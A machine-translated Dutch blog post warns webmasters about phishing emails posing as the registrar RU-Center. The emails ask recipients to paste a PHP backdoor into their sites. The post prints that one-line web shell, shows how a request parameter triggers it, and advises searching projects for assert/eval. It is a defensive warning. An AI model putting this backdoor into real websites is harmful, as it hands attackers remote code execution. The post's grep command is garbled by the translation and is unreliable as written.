Aandacht voor "webmasters" die geen PHP kennen. Kwetsbaarheid.

Dit is een automatische vertaling.
Klik hier om de publicatie in de originele taal te lezen.

Vandaag ontvingen enkele van mijn vrienden brieven, naar verluidt van RU-Center (de grootste Russische domeinnaamregistrar) - nic.ru , met de volgende inhoud:

Er zijn brieven gestuurd van info@nic.technical . In de brief stellen de aanvallers, die namens het RU-Center optreden, voor om de volgende code op de website te plaatsen:

 <?php assert(stripslashes($_REQUEST[RUCENTER])); ?>

Helaas kennen veel van onze collega's, die zichzelf "webmasters" noemen (vele site-eigenaren), geen PHP en denken niet na over de gevaren van bovenstaande code. Als u een string als parameter aan deze functie doorgeeft, wordt deze door assert () als PHP-code beschouwd! Wees voorzichtig!

Ik raad je aan om je php-projecten te inspecteren op kwetsbaarheden met behulp van de assert- of eval-commando's. Als deze commando's aanwezig zijn in de projectcode, raak dan niet in paniek - bestudeer hun algoritme. Geautoriseerd gebruik van algoritmen is heel goed mogelijk. In het geval van het bovenstaande voorbeeld stelt de opdracht aanvallers in staat om uw site aan te roepen, bijvoorbeeld met behulp van de RUCENTER-parameter - http://sistema-audit.ru/?RUCENTER=PHP-code

We raden u aan een zoekopdracht uit te voeren met bijvoorbeeld het linux-commando grep -i -r 'asset' / home / www / mijnsite / * om de map met de sitebestanden aan te geven om een lijst met bestanden te krijgen waarin de verdachte instantie is gebruikte code.

Zorg goed voor jezelf en je sites!

Dit is een automatische vertaling.
Klik hier om de publicatie in de originele taal te lezen.